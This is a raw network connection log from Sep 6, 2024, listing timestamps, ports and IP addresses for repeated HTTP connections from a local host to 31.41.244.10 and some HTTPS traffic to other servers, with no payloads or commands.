Sep 6, 2024 09:59:13.159694910 CEST	80	49882	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:13.159771919 CEST	49882	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:13.159847021 CEST	80	49883	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:13.159954071 CEST	49883	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:13.160228968 CEST	49883	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:13.165189981 CEST	80	49883	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:13.972117901 CEST	80	49883	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:13.972261906 CEST	49883	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:14.079433918 CEST	49883	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:14.080056906 CEST	49885	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:14.085259914 CEST	80	49883	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:14.085321903 CEST	80	49885	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:14.085397959 CEST	49883	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:14.085432053 CEST	49885	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:14.085547924 CEST	49885	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:14.090342045 CEST	80	49885	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:14.796653986 CEST	80	49885	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:14.796828032 CEST	49885	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:14.800761938 CEST	49885	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:14.801062107 CEST	49886	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:14.805866003 CEST	80	49885	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:14.805881977 CEST	80	49886	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:14.806087017 CEST	49885	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:14.806127071 CEST	49886	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:14.806576014 CEST	49886	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:14.811381102 CEST	80	49886	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:15.530692101 CEST	80	49886	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:15.530816078 CEST	49886	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:15.640794039 CEST	49886	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:15.641105890 CEST	49887	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:15.646323919 CEST	80	49886	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:15.646698952 CEST	80	49887	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:15.647001028 CEST	49886	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:15.647061110 CEST	49887	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:15.647588015 CEST	49887	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:15.652618885 CEST	80	49887	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:16.352927923 CEST	80	49887	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:16.353091955 CEST	49887	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:16.356108904 CEST	49887	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:16.356709003 CEST	49888	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:16.361210108 CEST	80	49887	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:16.361345053 CEST	49887	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:16.361504078 CEST	80	49888	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:16.361685038 CEST	49888	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:16.361964941 CEST	49888	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:16.366755962 CEST	80	49888	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:16.616206884 CEST	49889	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:16.616283894 CEST	443	49889	34.107.243.93	192.168.2.7
Sep 6, 2024 09:59:16.616827011 CEST	49889	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:16.618629932 CEST	49889	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:16.618647099 CEST	443	49889	34.107.243.93	192.168.2.7
Sep 6, 2024 09:59:16.656959057 CEST	49890	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.657005072 CEST	443	49890	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:16.657316923 CEST	49891	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.657354116 CEST	443	49891	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:16.657993078 CEST	49892	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.657999992 CEST	443	49892	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:16.658184052 CEST	49893	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.658191919 CEST	443	49893	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:16.658292055 CEST	49894	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.658298969 CEST	443	49894	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:16.658380985 CEST	49895	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.658385992 CEST	443	49895	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:16.665373087 CEST	49890	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.665395021 CEST	49891	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.665395021 CEST	49893	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.665395021 CEST	49894	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.665402889 CEST	49892	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.665436983 CEST	49895	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.665955067 CEST	49890	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.665961027 CEST	443	49890	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:16.666245937 CEST	49891	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.666253090 CEST	443	49891	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:16.666340113 CEST	49892	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.666344881 CEST	443	49892	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:16.666546106 CEST	49895	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.666548967 CEST	443	49895	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:16.666660070 CEST	49894	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.666665077 CEST	443	49894	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:16.666762114 CEST	49893	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:16.666765928 CEST	443	49893	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:16.953628063 CEST	49896	443	192.168.2.7	23.200.0.9
Sep 6, 2024 09:59:16.953679085 CEST	443	49896	23.200.0.9	192.168.2.7
Sep 6, 2024 09:59:16.953804016 CEST	49896	443	192.168.2.7	23.200.0.9
Sep 6, 2024 09:59:16.954297066 CEST	49896	443	192.168.2.7	23.200.0.9
Sep 6, 2024 09:59:16.954314947 CEST	443	49896	23.200.0.9	192.168.2.7
Sep 6, 2024 09:59:17.090919018 CEST	443	49889	34.107.243.93	192.168.2.7
Sep 6, 2024 09:59:17.091015100 CEST	49889	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:17.093388081 CEST	80	49888	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:17.093813896 CEST	49888	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:17.095506907 CEST	49889	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:17.095521927 CEST	443	49889	34.107.243.93	192.168.2.7
Sep 6, 2024 09:59:17.095608950 CEST	49889	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:17.095710039 CEST	443	49889	34.107.243.93	192.168.2.7
Sep 6, 2024 09:59:17.095828056 CEST	49889	443	192.168.2.7	34.107.243.93
Sep 6, 2024 09:59:17.098833084 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:17.103993893 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:17.127768993 CEST	443	49895	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.127784014 CEST	443	49895	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.127896070 CEST	49895	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.129525900 CEST	443	49894	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.129540920 CEST	443	49894	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.129662037 CEST	443	49893	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.129679918 CEST	443	49893	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.131129980 CEST	49894	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.131293058 CEST	49893	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.131726980 CEST	49895	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.131738901 CEST	443	49895	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.132002115 CEST	443	49895	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.133096933 CEST	443	49890	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.133116007 CEST	443	49890	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.134340048 CEST	49893	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.134350061 CEST	443	49893	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.134620905 CEST	443	49893	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.136600971 CEST	49894	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.136609077 CEST	443	49894	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.136920929 CEST	443	49894	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.137825012 CEST	443	49892	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.137842894 CEST	443	49892	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.139854908 CEST	49895	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.140002012 CEST	443	49895	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.140088081 CEST	49895	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.140096903 CEST	443	49895	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.140192032 CEST	49893	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.140311956 CEST	49893	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.140377045 CEST	443	49893	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.140719891 CEST	49897	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.140753984 CEST	443	49897	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.140935898 CEST	49898	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.140944004 CEST	443	49898	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.141272068 CEST	49894	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.141360044 CEST	49894	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.141488075 CEST	443	49894	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.141587973 CEST	49893	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.141604900 CEST	49890	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.144337893 CEST	49894	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.144359112 CEST	49892	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.144359112 CEST	49895	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.144377947 CEST	49893	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.144397020 CEST	49894	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.144397020 CEST	49897	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.144782066 CEST	49890	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.144788027 CEST	443	49890	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.144790888 CEST	49898	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.145047903 CEST	443	49891	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.145065069 CEST	443	49891	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.145098925 CEST	443	49890	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.146533012 CEST	49891	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.148107052 CEST	49892	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.148113012 CEST	443	49892	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.148371935 CEST	443	49892	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.148729086 CEST	49898	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.148741007 CEST	443	49898	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.151300907 CEST	49891	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.151305914 CEST	443	49891	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.151401997 CEST	49897	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.151412964 CEST	443	49897	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.151571989 CEST	443	49891	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.154458046 CEST	49890	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.154566050 CEST	49890	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.154665947 CEST	443	49890	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.155167103 CEST	49892	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.155314922 CEST	443	49892	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.155390024 CEST	49892	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.155395985 CEST	443	49892	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.155767918 CEST	49891	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.155832052 CEST	49891	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.155926943 CEST	443	49891	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.155981064 CEST	49891	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.155991077 CEST	49890	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.156060934 CEST	49892	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.156302929 CEST	49891	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.198914051 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:17.201961994 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:17.206985950 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:17.213056087 CEST	49888	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:17.213463068 CEST	49899	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:17.218276978 CEST	80	49888	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:17.218431950 CEST	49888	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:17.218626022 CEST	80	49899	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:17.218817949 CEST	49899	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:17.219007969 CEST	49899	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:17.224004984 CEST	80	49899	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:17.274699926 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:17.508059978 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:17.508625031 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:17.510349989 CEST	443	49896	23.200.0.9	192.168.2.7
Sep 6, 2024 09:59:17.511471987 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:17.512012005 CEST	49896	443	192.168.2.7	23.200.0.9
Sep 6, 2024 09:59:17.512038946 CEST	443	49896	23.200.0.9	192.168.2.7
Sep 6, 2024 09:59:17.512376070 CEST	443	49896	23.200.0.9	192.168.2.7
Sep 6, 2024 09:59:17.513781071 CEST	49896	443	192.168.2.7	23.200.0.9
Sep 6, 2024 09:59:17.513851881 CEST	443	49896	23.200.0.9	192.168.2.7
Sep 6, 2024 09:59:17.513953924 CEST	49896	443	192.168.2.7	23.200.0.9
Sep 6, 2024 09:59:17.559309959 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:17.560511112 CEST	443	49896	23.200.0.9	192.168.2.7
Sep 6, 2024 09:59:17.560548067 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:17.605936050 CEST	443	49897	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.605936050 CEST	443	49898	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.606141090 CEST	49897	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.606141090 CEST	49898	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.609788895 CEST	49897	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.609797955 CEST	443	49897	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.610070944 CEST	443	49897	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.612396002 CEST	49898	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.612409115 CEST	443	49898	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.612693071 CEST	443	49898	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.615885973 CEST	49897	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.616077900 CEST	443	49897	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.616686106 CEST	49897	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.616694927 CEST	443	49897	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.616708994 CEST	49898	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.616811037 CEST	49898	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.616868973 CEST	443	49898	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.618985891 CEST	49898	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.621206045 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:17.626142025 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:17.650800943 CEST	49896	443	192.168.2.7	23.200.0.9
Sep 6, 2024 09:59:17.658169985 CEST	443	49896	23.200.0.9	192.168.2.7
Sep 6, 2024 09:59:17.658271074 CEST	443	49896	23.200.0.9	192.168.2.7
Sep 6, 2024 09:59:17.658344030 CEST	49896	443	192.168.2.7	23.200.0.9
Sep 6, 2024 09:59:17.658668041 CEST	49896	443	192.168.2.7	23.200.0.9
Sep 6, 2024 09:59:17.658687115 CEST	443	49896	23.200.0.9	192.168.2.7
Sep 6, 2024 09:59:17.715951920 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:17.719358921 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:17.724239111 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:17.771749973 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:17.814310074 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 09:59:17.820516109 CEST	443	49897	34.120.208.123	192.168.2.7
Sep 6, 2024 09:59:17.820583105 CEST	49897	443	192.168.2.7	34.120.208.123
Sep 6, 2024 09:59:17.872543097 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:59:17.918221951 CEST	80	49899	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:17.918327093 CEST	49899	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:17.921461105 CEST	49899	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:17.921827078 CEST	49900	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:17.928611040 CEST	80	49900	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:17.928800106 CEST	49900	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:17.928818941 CEST	80	49899	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:17.928949118 CEST	49900	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:17.929006100 CEST	49899	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:17.933927059 CEST	80	49900	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:17.934076071 CEST	49900	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:17.936158895 CEST	49900	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:18.058845043 CEST	49901	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:18.063735962 CEST	80	49901	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:18.063869953 CEST	49901	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:18.064146996 CEST	49901	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:18.068994999 CEST	80	49901	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:18.757885933 CEST	80	49901	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:18.760598898 CEST	49901	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:18.764195919 CEST	49901	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:18.764451027 CEST	49902	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:18.769326925 CEST	80	49901	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:18.769402027 CEST	49901	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:18.769700050 CEST	80	49902	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:18.769802094 CEST	49902	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:18.770100117 CEST	49902	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:18.775008917 CEST	80	49902	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:19.489217043 CEST	80	49902	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:19.489289045 CEST	49902	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:19.603133917 CEST	49902	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:19.603423119 CEST	49903	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:19.610603094 CEST	80	49902	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:19.610855103 CEST	80	49903	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:19.610944033 CEST	49902	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:19.610984087 CEST	49903	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:19.611203909 CEST	49903	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:19.616146088 CEST	80	49903	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:20.757217884 CEST	80	49903	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:20.757380962 CEST	80	49903	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:20.757394075 CEST	49903	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:20.757575035 CEST	80	49903	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:20.757636070 CEST	49903	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:20.757962942 CEST	49903	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:20.761491060 CEST	49903	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:20.761763096 CEST	49904	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:20.766367912 CEST	80	49903	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:20.766597986 CEST	80	49904	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:20.766949892 CEST	49903	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:20.766993999 CEST	49904	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:20.767294884 CEST	49904	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:20.772100925 CEST	80	49904	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:21.487922907 CEST	80	49904	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:21.487999916 CEST	49904	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:21.601721048 CEST	49904	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:21.601995945 CEST	49905	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:21.606839895 CEST	80	49904	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:21.606878996 CEST	80	49905	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:21.606969118 CEST	49904	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:21.607009888 CEST	49905	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:21.607204914 CEST	49905	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:21.612189054 CEST	80	49905	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:22.321192980 CEST	80	49905	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:22.321312904 CEST	49905	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:22.324448109 CEST	49905	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:22.324851990 CEST	49906	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:22.330153942 CEST	80	49905	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:22.330215931 CEST	49905	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:22.330308914 CEST	80	49906	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:22.330409050 CEST	49906	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:22.330621004 CEST	49906	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:22.335525990 CEST	80	49906	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:23.164788961 CEST	80	49906	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:23.164916039 CEST	49906	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:23.274189949 CEST	49906	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:23.274476051 CEST	49907	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:23.279438019 CEST	80	49906	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:23.279536009 CEST	49906	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:23.279567003 CEST	80	49907	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:23.279849052 CEST	49907	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:23.280334949 CEST	49907	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:23.285109043 CEST	80	49907	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:24.155801058 CEST	80	49907	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:24.155900002 CEST	49907	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:24.160090923 CEST	49907	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:24.160388947 CEST	49908	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:24.165164948 CEST	80	49908	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:24.165375948 CEST	80	49907	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:24.165481091 CEST	49907	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:24.165568113 CEST	49908	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:24.165740013 CEST	49908	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:24.170732975 CEST	80	49908	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:24.865221977 CEST	80	49908	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:24.865319014 CEST	49908	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:24.978426933 CEST	49908	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:24.979243994 CEST	49909	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:24.983586073 CEST	80	49908	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:24.983850956 CEST	49908	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:24.984075069 CEST	80	49909	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:24.984148979 CEST	49909	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:24.984472036 CEST	49909	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:59:24.989315033 CEST	80	49909	31.41.244.10	192.168.2.7
Sep 6, 2024 09:59:25.698282957 CEST	80	49909	31.41.244.10	192.168.2.7
